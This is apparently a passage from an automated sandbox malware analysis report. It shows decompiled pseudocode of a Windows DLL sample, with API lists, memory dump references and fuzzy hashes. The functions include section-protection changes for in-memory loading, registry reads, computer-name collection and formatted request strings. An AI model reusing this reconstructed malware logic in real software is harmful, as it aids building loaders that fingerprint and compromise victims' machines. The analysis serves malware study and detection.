                  				_t4 = _t24 + 0xbbede0; // 0x3619388
                  				_t5 = _t24 + 0xbbed88; // 0x4f0053
                  				_t26 = E00BB1CCE( &_v16, _v8, _t5, _t4); // executed
                  				_t45 = _t26;
                  				if(_t45 == 0) {
                  					StrToIntExW(_v16, 0,  &_v12);
                  					_t45 = 8;
                  					if(_v12 < _t45) {
                  						_t45 = 1;
                  						__eflags = 1;
                  					} else {
                  						_t32 =  *0xbbd2a4; // 0x2a5a5a8
                  						_t11 = _t32 + 0xbbedd4; // 0x361937c
                  						_t48 = _t11;
                  						_t12 = _t32 + 0xbbed88; // 0x4f0053
                  						_t52 = E00BB5115(_t11, _t12, _t11);
                  						_t59 = _t52;
                  						if(_t52 != 0) {
                  							_t35 =  *0xbbd2a4; // 0x2a5a5a8
                  							_t13 = _t35 + 0xbbee1e; // 0x30314549
                  							if(E00BB5DFD(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                  								_t61 =  *0xbbd25c - 6;
                  								if( *0xbbd25c <= 6) {
                  									_t42 =  *0xbbd2a4; // 0x2a5a5a8
                  									_t15 = _t42 + 0xbbec2a; // 0x52384549
                  									E00BB5DFD(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                  								}
                  							}
                  							_t38 =  *0xbbd2a4; // 0x2a5a5a8
                  							_t17 = _t38 + 0xbbee18; // 0x36193c0
                  							_t18 = _t38 + 0xbbedf0; // 0x680043
                  							_t40 = E00BB9D43(_v8, 0x80000001, _t52, _t18, _t17); // executed
                  							_t45 = _t40;
                  							HeapFree( *0xbbd238, 0, _t52);
                  						}
                  					}
                  					HeapFree( *0xbbd238, 0, _v16);
                  				}
                  				_t54 = _v8;
                  				if(_v8 != 0) {
                  					E00BB9D8B(_t54);
                  				}
                  				return _t45;
                  			}




















                  APIs
                  • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03619388,00000000,?,74B5F710,00000000,74B5F730), ref: 00BB873F
                  • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,036193C0,?,00000000,30314549,00000014,004F0053,0361937C), ref: 00BB87DC
                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00BB780E), ref: 00BB87EE
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: c7dc82a5949298a772ac1c5fd6af66cfd220cdfc051209a08de779b93f7daa24
                  • Instruction ID: d059822e5cbdc5b0c74254fc464c9143d944bfa9a8e7613f5f377411718e5add
                  • Opcode Fuzzy Hash: c7dc82a5949298a772ac1c5fd6af66cfd220cdfc051209a08de779b93f7daa24
                  • Instruction Fuzzy Hash: 3F316B32A00149AFDB11ABA5DD85EFA7BFDEB44704F1101A5B604AB161EBF0DE05DB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E00BB9958(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                  				void* _v8;
                  				void* __edi;
                  				intOrPtr _t18;
                  				void* _t24;
                  				void* _t30;
                  				void* _t36;
                  				void* _t40;
                  				intOrPtr _t42;
                  
                  				_t36 = __edx;
                  				_t32 = __ecx;
                  				_push(__ecx);
                  				_push(__ecx);
                  				_t42 =  *0xbbd340; // 0x3619918
                  				_push(0x800);
                  				_push(0);
                  				_push( *0xbbd238);
                  				if( *0xbbd24c >= 5) {
                  					if(RtlAllocateHeap() == 0) {
                  						L6:
                  						_t30 = 8;
                  						L7:
                  						if(_t30 != 0) {
                  							L10:
                  							 *0xbbd24c =  *0xbbd24c + 1;
                  							L11:
                  							return _t30;
                  						}
                  						_t44 = _a4;
                  						_t40 = _v8;
                  						 *_a16 = _a4;
                  						 *_a20 = E00BBA28E(_t44, _t40);
                  						_t18 = E00BB1E09(_t40, _t44);
                  						if(_t18 != 0) {
                  							 *_a8 = _t40;
                  							 *_a12 = _t18;
                  							if( *0xbbd24c < 5) {
                  								 *0xbbd24c =  *0xbbd24c & 0x00000000;
                  							}
                  							goto L11;
                  						}
                  						_t30 = 0xbf;
                  						E00BB14EF();
                  						HeapFree( *0xbbd238, 0, _t40);
                  						goto L10;
                  					}
                  					_t24 = E00BB5E79(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
                  					L5:
                  					_t30 = _t24;
                  					goto L7;
                  				}
                  				if(RtlAllocateHeap() == 0) {
                  					goto L6;
                  				}
                  				_t24 = E00BB9DB0(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
                  				goto L5;
                  			}












                  APIs
                  • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 00BB997C
                    • Part of subcall function 00BB9DB0: GetTickCount.KERNEL32 ref: 00BB9DC4
                    • Part of subcall function 00BB9DB0: wsprintfA.USER32 ref: 00BB9E14
                    • Part of subcall function 00BB9DB0: wsprintfA.USER32 ref: 00BB9E31
                    • Part of subcall function 00BB9DB0: wsprintfA.USER32 ref: 00BB9E5D
                    • Part of subcall function 00BB9DB0: HeapFree.KERNEL32(00000000,?), ref: 00BB9E6F
                    • Part of subcall function 00BB9DB0: wsprintfA.USER32 ref: 00BB9E90
                    • Part of subcall function 00BB9DB0: HeapFree.KERNEL32(00000000,?), ref: 00BB9EA0
                    • Part of subcall function 00BB9DB0: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00BB9ECE
                    • Part of subcall function 00BB9DB0: GetTickCount.KERNEL32 ref: 00BB9EDF
                  • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 00BB999A
                  • HeapFree.KERNEL32(00000000,00000002,00BB7859,?,00BB7859,00000002,?,?,00BB19AA,?), ref: 00BB99F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Heap$wsprintf$AllocateFree$CountTick
                  • String ID:
                  • API String ID: 1676223858-0
                  • Opcode ID: 0a18038ef4eabe3eb6fd449ef9e271f4ccf81fdf06895eb1ad3b10605446710b
                  • Instruction ID: eea74f3af94dc46df479cb09c6073d79546ff894dffc8aedd2c3274f5682c9c5
                  • Opcode Fuzzy Hash: 0a18038ef4eabe3eb6fd449ef9e271f4ccf81fdf06895eb1ad3b10605446710b
                  • Instruction Fuzzy Hash: 44216A75200204EFDB519F99DC80AEA77ECEF49350F1041AAFA0197250EBF4E940DFA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 87%
                  			E6E0C10AD(void* __eax, void* _a4) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				long _v20;
                  				int _t43;
                  				long _t54;
                  				signed int _t57;
                  				void* _t58;
                  				signed int _t60;
                  
                  				_v12 = _v12 & 0x00000000;
                  				_t57 =  *0x6e0c4140;
                  				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                  				_v16 =  *(__eax + 6) & 0x0000ffff;
                  				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
                  				_v8 = _v8 & 0x00000000;
                  				if(_v16 <= 0) {
                  					L12:
                  					return _v12;
                  				} else {
                  					goto L1;
                  				}
                  				while(1) {
                  					L1:
                  					_t60 = _v12;
                  					if(_t60 != 0) {
                  						goto L12;
                  					}
                  					asm("bt [esi+0x24], eax");
                  					if(_t60 >= 0) {
                  						asm("bt [esi+0x24], eax");
                  						if(__eflags >= 0) {
                  							L8:
                  							_t54 = _t57 - 0x63699bbf;
                  							L9:
                  							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                  							if(_t43 == 0) {
                  								_v12 = GetLastError();
                  							}
                  							_v8 = _v8 + 1;
                  							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
                  							if(_v8 < _v16) {
                  								continue;
                  							} else {
                  								goto L12;
                  							}
                  						}
                  						asm("bt [esi+0x24], eax");
                  						_t54 = _t57 - 0x63699bc1;
                  						if(__eflags >= 0) {
                  							goto L9;
                  						}
                  						goto L8;
                  					}
                  					asm("bt [esi+0x24], eax");
                  					if(_t60 >= 0) {
                  						_t54 = _t57 - 0x63699ba3;
                  					} else {
                  						_t54 = _t57 - 0x63699b83;
                  					}
                  					goto L9;
                  				}
                  				goto L12;
                  			}













                  APIs
                  • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E0C10E6
                  • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E0C115B
                  • GetLastError.KERNEL32 ref: 6E0C1161
                  Memory Dump Source
                  • Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true
                  • Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp
                  Similarity
                  • API ID: ProtectVirtual$ErrorLast
                  • String ID:
                  • API String ID: 1469625949-0
                  • Opcode ID: 109fd72faadcf776941271c40f4c81480927745f013c5a0431e0f4048693c0a9
                  • Instruction ID: 75a552f68f7f2b390ef0100c45fe7e69fab2262c0f5b68249eae3b736b8e0372
                  • Opcode Fuzzy Hash: 109fd72faadcf776941271c40f4c81480927745f013c5a0431e0f4048693c0a9
                  • Instruction Fuzzy Hash: 67214B3280020AEFDB14CF95C485AAEF7F5FB08B19F004859D40697585E3B8AA99CB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E00BB1E40(void* __eflags, int _a4) {
                  				intOrPtr _v12;
                  				WCHAR* _v16;
                  				char* _v20;
                  				int _v24;
                  				void* _v36;
                  				char _v40;
                  				char _v68;
                  				char _v72;
                  				char _v76;
                  				char _v80;
                  				void _v84;
                  				char _v88;
                  				void* __esi;
                  				intOrPtr _t40;
                  				int _t45;
                  				intOrPtr _t50;
                  				intOrPtr _t52;
                  				void* _t55;
                  				intOrPtr _t67;
                  				void* _t70;
                  				void* _t80;
                  				WCHAR* _t85;
                  
                  				_v88 = 0;
                  				memset( &_v84, 0, 0x2c);
                  				_v40 = 0;
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				_t40 =  *0xbbd2a4; // 0x2a5a5a8
                  				_t5 = _t40 + 0xbbee40; // 0x410025
                  				_t85 = E00BB771C(_t5);
                  				_v16 = _t85;
                  				if(_t85 == 0) {
                  					_t80 = 8;
                  					L24:
                  					return _t80;
                  				}
                  				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
                  				if(_t45 != 0) {
                  					_t80 = 1;
                  					L22:
                  					E00BB5DE8(_v16);
                  					goto L24;
                  				}
                  				if(E00BB4EC8(0,  &_a4) != 0) {
                  					_a4 = 0;
                  				}
                  				_t50 = E00BB8ECC(0,  *0xbbd33c);
                  				_v12 = _t50;
                  				if(_t50 == 0) {
                  					_t80 = 8;
                  					goto L19;
                  				} else {
                  					_t52 =  *0xbbd2a4; // 0x2a5a5a8
                  					_t11 = _t52 + 0xbbe81a; // 0x65696c43
                  					_t55 = E00BB8ECC(0, _t11);
                  					_t87 = _t55;
                  					if(_t55 == 0) {
                  						_t80 = 8;
                  					} else {
                  						_t80 = E00BB386E(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
                  						E00BB5DE8(_t87);
                  					}
                  					if(_t80 != 0) {
                  						L17:
                  						E00BB5DE8(_v12);
                  						L19:
                  						_t86 = _a4;
                  						if(_a4 != 0) {
                  							E00BB9D8B(_t86);
                  						}
                  						goto L22;
                  					} else {
                  						if(( *0xbbd260 & 0x00000001) == 0) {
                  							L14:
                  							E00BB10D9(_v84, _v88, _v88,  *0xbbd270, 0);
                  							_t80 = E00BB656F(_v88,  &_v80,  &_v76, 0);
                  							if(_t80 == 0) {
                  								_v24 = _a4;
                  								_v20 =  &_v88;
                  								_t80 = E00BB9306( &_v40, 0);
                  							}
                  							E00BB5DE8(_v88);
                  							goto L17;
                  						}
                  						_t67 =  *0xbbd2a4; // 0x2a5a5a8
                  						_t18 = _t67 + 0xbbe823; // 0x65696c43
                  						_t70 = E00BB8ECC(0, _t18);
                  						_t89 = _t70;
                  						if(_t70 == 0) {
                  							_t80 = 8;
                  						} else {
                  							_t80 = E00BB386E(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
                  							E00BB5DE8(_t89);
                  						}
                  						if(_t80 != 0) {
                  							goto L17;
                  						} else {
                  							goto L14;
                  						}
                  					}
                  				}
                  			}


























                  APIs
                  • memset.NTDLL ref: 00BB1E55
                    • Part of subcall function 00BB771C: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00BB1E7B,00410025,00000005,?,00000000), ref: 00BB772D
                    • Part of subcall function 00BB771C: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 00BB774A
                  • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00BB1E89
                  • StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 00BB1E94
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: EnvironmentExpandStrings$lstrlenmemset
                  • String ID:
                  • API String ID: 3817122888-0
                  • Opcode ID: 196c92e5ab9c481dcf0f3402f480472adcc8b36725bcd1fa788fe43972766636
                  • Instruction ID: 38a98e7c2b94270bb82be1f77f5a72c1f1cc46e57aedbc43a96e2c4c1ef7c449
                  • Opcode Fuzzy Hash: 196c92e5ab9c481dcf0f3402f480472adcc8b36725bcd1fa788fe43972766636
                  • Instruction Fuzzy Hash: 42412A72A00219ABDB11ABE8CD85DFE7BEDEF04300B5049A6F905AB111E7F5DE45CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E00BB9A9E(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                  				void* _v8;
                  				void* __esi;
                  				intOrPtr* _t35;
                  				void* _t40;
                  				intOrPtr* _t41;
                  				intOrPtr* _t43;
                  				intOrPtr* _t45;
                  				intOrPtr* _t50;
                  				intOrPtr* _t52;
                  				void* _t54;
                  				intOrPtr* _t55;
                  				intOrPtr* _t57;
                  				intOrPtr* _t61;
                  				intOrPtr* _t65;
                  				intOrPtr _t68;
                  				void* _t72;
                  				void* _t75;
                  				void* _t76;
                  
                  				_t55 = _a4;
                  				_t35 =  *((intOrPtr*)(_t55 + 4));
                  				_a4 = 0;
                  				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                  				if(_t76 < 0) {
                  					L18:
                  					return _t76;
                  				}
                  				_t40 = E00BB546B(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                  				_t76 = _t40;
                  				if(_t76 >= 0) {
                  					_t61 = _a28;
                  					if(_t61 != 0 &&  *_t61 != 0) {
                  						_t52 = _v8;
                  						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                  					}
                  					if(_t76 >= 0) {
                  						_t43 =  *_t55;
                  						_t68 =  *0xbbd2a4; // 0x2a5a5a8
                  						_t20 = _t68 + 0xbbe1fc; // 0x740053
                  						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                  						if(_t76 >= 0) {
                  							_t76 = E00BBA3D7(_a4);
                  							if(_t76 >= 0) {
                  								_t65 = _a28;
                  								if(_t65 != 0 &&  *_t65 == 0) {
                  									_t50 = _a4;
                  									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                  								}
                  							}
                  						}
                  						_t45 = _a4;
                  						if(_t45 != 0) {
                  							 *((intOrPtr*)( *_t45 + 8))(_t45);
                  						}
                  						_t57 = __imp__#6;
                  						if(_a20 != 0) {
                  							 *_t57(_a20);
                  						}
                  						if(_a12 != 0) {
                  							 *_t57(_a12);
                  						}
                  					}
                  				}
                  				_t41 = _v8;
                  				 *((intOrPtr*)( *_t41 + 8))(_t41);
                  				goto L18;
                  			}






















                  APIs
                    • Part of subcall function 00BB546B: SysAllocString.OLEAUT32(80000002), ref: 00BB54C8
                    • Part of subcall function 00BB546B: SysFreeString.OLEAUT32(00000000), ref: 00BB552E
                  • SysFreeString.OLEAUT32(?), ref: 00BB9B7D
                  • SysFreeString.OLEAUT32(00BB9595), ref: 00BB9B87
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: String$Free$Alloc
                  • String ID:
                  • API String ID: 986138563-0
                  • Opcode ID: 11962444abc5879c0710a31bfa65eb3830304e44ce5452db1789d3929b0cd7b2
                  • Instruction ID: 2cf3e887236098aa7460da0925ee8bf18eaabf5cc60c0a6ed5260e563592be20
                  • Opcode Fuzzy Hash: 11962444abc5879c0710a31bfa65eb3830304e44ce5452db1789d3929b0cd7b2
                  • Instruction Fuzzy Hash: 49313971500119EFCB21DF98D888CEBBBB9FBC97507154698F9059B210D6B1ED51CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E6E0C1718() {
                  				char _v16;
                  				intOrPtr _v28;
                  				void _v32;
                  				void* _v36;
                  				intOrPtr _t15;
                  				void* _t16;
                  				long _t25;
                  				int _t26;
                  				void* _t30;
                  				intOrPtr* _t32;
                  				signed int _t36;
                  				intOrPtr _t39;
                  
                  				_t15 =  *0x6e0c4144;
                  				if( *0x6e0c412c > 5) {
                  					_t16 = _t15 + 0x6e0c50f9;
                  				} else {
                  					_t16 = _t15 + 0x6e0c50b1;
                  				}
                  				E6E0C1FB4(_t16, _t16);
                  				_t36 = 6;
                  				memset( &_v32, 0, _t36 << 2);
                  				if(E6E0C118F( &_v32,  &_v16,  *0x6e0c4140 ^ 0xfd7cd1cf) == 0) {
                  					_t25 = 0xb;
                  				} else {
                  					_t26 = lstrlenW( *0x6e0c4138);
                  					_t8 = _t26 + 2; // 0x2
                  					_t11 = _t26 + _t8 + 8; // 0xa
                  					_t30 = E6E0C195D(_t39, _t11,  &_v32,  &_v36); // executed
                  					if(_t30 == 0) {
                  						_t32 = _v36;
                  						 *_t32 = 0;
                  						if( *0x6e0c4138 == 0) {
                  							 *((short*)(_t32 + 4)) = 0;
                  						} else {
                  							E6E0C2034(_t44, _t32 + 4);
                  						}
                  					}
                  					_t25 = E6E0C1B56(_v28); // executed
                  				}
                  				ExitThread(_t25);
                  			}
















                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true
                  • Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp
                  Similarity
                  • API ID: ExitThreadlstrlen
                  • String ID:
                  • API String ID: 2636182767-0
                  • Opcode ID: 024cda3f60b555dcc384fc7e74925beaa0534f303dbb58d8ecf9f93525b833e0
                  • Instruction ID: bfcd913f7bf6f9f48c3303916b879256a67fc2c575525c931b920f2b130e0043
                  • Opcode Fuzzy Hash: 024cda3f60b555dcc384fc7e74925beaa0534f303dbb58d8ecf9f93525b833e0
                  • Instruction Fuzzy Hash: 97116D72508605AFDB11DBE5C848F8F77FCAB46B44F010A26F995D71A0E730E5898B93
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SysAllocString.OLEAUT32(00BB23DB), ref: 00BB1DB7
                    • Part of subcall function 00BB9A9E: SysFreeString.OLEAUT32(?), ref: 00BB9B7D
                  • SysFreeString.OLEAUT32(00000000), ref: 00BB1DF8
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: String$Free$Alloc
                  • String ID:
                  • API String ID: 986138563-0
                  • Opcode ID: 3134845adc304e74c18be430450722d9e11d0ceb79e8ea96d8af5140e853a456
                  • Instruction ID: 9fe7874dea27eaefe2faea59b6a14042aed225d8b68d32f630629a299d3fea08
                  • Opcode Fuzzy Hash: 3134845adc304e74c18be430450722d9e11d0ceb79e8ea96d8af5140e853a456
                  • Instruction Fuzzy Hash: 35014B3650010ABFCB01DFA8D9098EF7BB9EF48350B114162FA09E7120E7B0DA15CBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00BB5369(void* __ecx) {
                  				signed int _v8;
                  				void* _t15;
                  				void* _t19;
                  				void* _t20;
                  				void* _t22;
                  				intOrPtr* _t23;
                  
                  				_t23 = __imp__;
                  				_t20 = 0;
                  				_v8 = _v8 & 0;
                  				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                  				_t10 = _v8;
                  				if(_v8 != 0) {
                  					_t20 = E00BB98E4(_t10 + 1);
                  					if(_t20 != 0) {
                  						_t15 =  *_t23(3, _t20,  &_v8); // executed
                  						if(_t15 != 0) {
                  							 *((char*)(_v8 + _t20)) = 0;
                  						} else {
                  							E00BB5DE8(_t20);
                  							_t20 = 0;
                  						}
                  					}
                  				}
                  				return _t20;
                  			}










                  APIs
                  • GetComputerNameExA.KERNELBASE(00000003,00000000,00BB5F06,74B5F710,00000000,?,?,00BB5F06), ref: 00BB5381
                    • Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0
                  • GetComputerNameExA.KERNELBASE(00000003,00000000,00BB5F06,00BB5F07,?,?,00BB5F06), ref: 00BB539E
                    • Part of subcall function 00BB5DE8: HeapFree.KERNEL32(00000000,00000000,00BB682B,00000000,?,?,00000000), ref: 00BB5DF4
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: ComputerHeapName$AllocateFree
                  • String ID:
                  • API String ID: 187446995-0
                  • Opcode ID: e60f30a7a9415279fd1b303bdeabb90b4341d1eaf5bb5efbea7e1b4327aea356
                  • Instruction ID: bf0c05d723bb0eed58fbb1b8ab8ab65ecbeda289188620af16713890a5c28b0c
                  • Opcode Fuzzy Hash: e60f30a7a9415279fd1b303bdeabb90b4341d1eaf5bb5efbea7e1b4327aea356
                  • Instruction Fuzzy Hash: 67F05E26A00549BBEB21D6AA8D01FFF77EDDBC5790F2100A9AA05D3241EAF0DE019671
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
                  				intOrPtr _t4;
                  				void* _t10;
                  				void* _t11;
                  				void* _t12;
                  				void* _t14;
                  
                  				_t14 = 1;
                  				_t4 = _a8;
                  				if(_t4 == 0) {
                  					if(InterlockedDecrement(0xbbd23c) == 0) {
                  						E00BB149B();
                  					}
                  				} else {
                  					if(_t4 == 1 && InterlockedIncrement(0xbbd23c) == 1) {
                  						_t10 = E00BBA1E3(_t11, _t12, _a4); // executed
                  						if(_t10 != 0) {
                  							_t14 = 0;
                  						}
                  					}
                  				}
                  				return _t14;
                  			}









                  APIs
                  • InterlockedIncrement.KERNEL32(00BBD23C), ref: 00BB5C06
                    • Part of subcall function 00BBA1E3: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00BB5C19,?), ref: 00BBA1F6
                  • InterlockedDecrement.KERNEL32(00BBD23C), ref: 00BB5C26
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Interlocked$CreateDecrementHeapIncrement
                  • String ID:
                  • API String ID: 3834848776-0
                  • Opcode ID: f6698688fb83f680aa06a5d57b70b2be2c98220053038beaa1c5dcdb96a83a1d
                  • Instruction ID: d1bb2a6f1e7e86b7cf0e48ced78eedb56e27491c6a541947e358793a214d998f
                  • Opcode Fuzzy Hash: f6698688fb83f680aa06a5d57b70b2be2c98220053038beaa1c5dcdb96a83a1d
                  • Instruction Fuzzy Hash: EEE04F31208B2E9B87316FA8DD49BFAAFD2DB21790F414994F482D1060E6E4CC409693
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 34%
                  			E00BB9CC9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                  				intOrPtr _v12;
                  				void* _v18;
                  				char _v20;
                  				intOrPtr _t15;
                  				void* _t17;
                  				intOrPtr _t19;
                  				void* _t23;
                  
                  				_v20 = 0;
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosw");
                  				_t15 =  *0xbbd2a4; // 0x2a5a5a8
                  				_t4 = _t15 + 0xbbe39c; // 0x3618944
                  				_t20 = _t4;
                  				_t6 = _t15 + 0xbbe124; // 0x650047
                  				_t17 = E00BB9A9E(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                  				if(_t17 < 0) {
                  					_t23 = _t17;
                  				} else {
                  					_t23 = 8;
                  					if(_v20 != _t23) {
                  						_t23 = 1;
                  					} else {
                  						_t19 = E00BB9079(_t20, _v12);
                  						if(_t19 != 0) {
                  							 *_a16 = _t19;
                  							_t23 = 0;
                  						}
                  						__imp__#6(_v12);
                  					}
                  				}
                  				return _t23;
                  			}











                  APIs
                    • Part of subcall function 00BB9A9E: SysFreeString.OLEAUT32(?), ref: 00BB9B7D
                    • Part of subcall function 00BB9079: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00BB8E57,004F0053,00000000,?), ref: 00BB9082
                    • Part of subcall function 00BB9079: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00BB8E57,004F0053,00000000,?), ref: 00BB90AC
                    • Part of subcall function 00BB9079: memset.NTDLL ref: 00BB90C0
                  • SysFreeString.OLEAUT32(00000000), ref: 00BB9D2C
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: FreeString$lstrlenmemcpymemset
                  • String ID:
                  • API String ID: 397948122-0
                  • Opcode ID: bb6420d0275edb3c8d6628f144f9ef121b7ae43337e8677f53fc6b5693600e6e
